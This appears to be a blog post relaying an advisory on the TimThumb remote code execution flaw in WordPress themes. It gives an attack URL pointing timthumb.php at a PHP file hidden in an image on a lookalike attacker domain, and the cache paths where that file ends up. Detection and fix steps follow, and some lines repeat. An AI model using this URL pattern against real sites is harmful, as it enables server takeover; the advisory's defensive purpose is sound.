TimThumb is prone to a Remote Code Execution vulnerability, due to the script does not check remotely cached files properly. By crafting aspecial image file with a valid MIME-type, and appending a PHP file at the end of this, it is possible to fool TimThumb into believing that it is a legitimate image, thus caching it locally in the cache directory.
Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.)
http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php
Stored file on the Target: (This can change from host to host.)
1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);
1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);
md5($src); means the input value of the ‘src’ GET-request – Hashed in MD5 format.
1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);
1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);
md5($src); means the input value of the ‘src’ GET-request – Hashed in MD5 format.
According to markmaunder.com:
To check if you have been hacked do the following:
Sign into your server using ssh
cd to your wordpress installation directory
run “grep -r base64_decode *”
You should see a few occurences but if any of them have a long encoded string between the parentheses, then you’re probably hacked.
The hacker used base64_decode in the file uploaded to the timthumb.php cache directory as well as where he injected code in my blog.
Also check your /tmp/ directory and if you have any suspicious files there like xwf.txt or any other .txt files, look at them in a text editor.
Also check your /tmp/ directory and if you have any suspicious files there like xwf.txt or any other .txt files, look at them in a text editor.
How to (possibly) fix this:
Go into your theme directory and figure out where timthumb.php is.
You might try “find /your/wordpress/dir/wp-content/themes/YourTheme/ -name “timthumb.php””
Edit timthumb and remove the list of external websites that content is allowed to be loaded from.
I have not audited the rest of the code, so this may or may not make it secure.
The developer really needs to use a regular expression to check the external hostnames images can be loaded from.
Alternatively:
Update to the latest version 1.34 or delete the timthumb file.NOTE: This file is often renamed and you should therefore issue
a command like this in a terminal: (Thanks to rAWjAW for this info.)
find . | grep php | xargs grep -s timthumb
No comments:
Post a Comment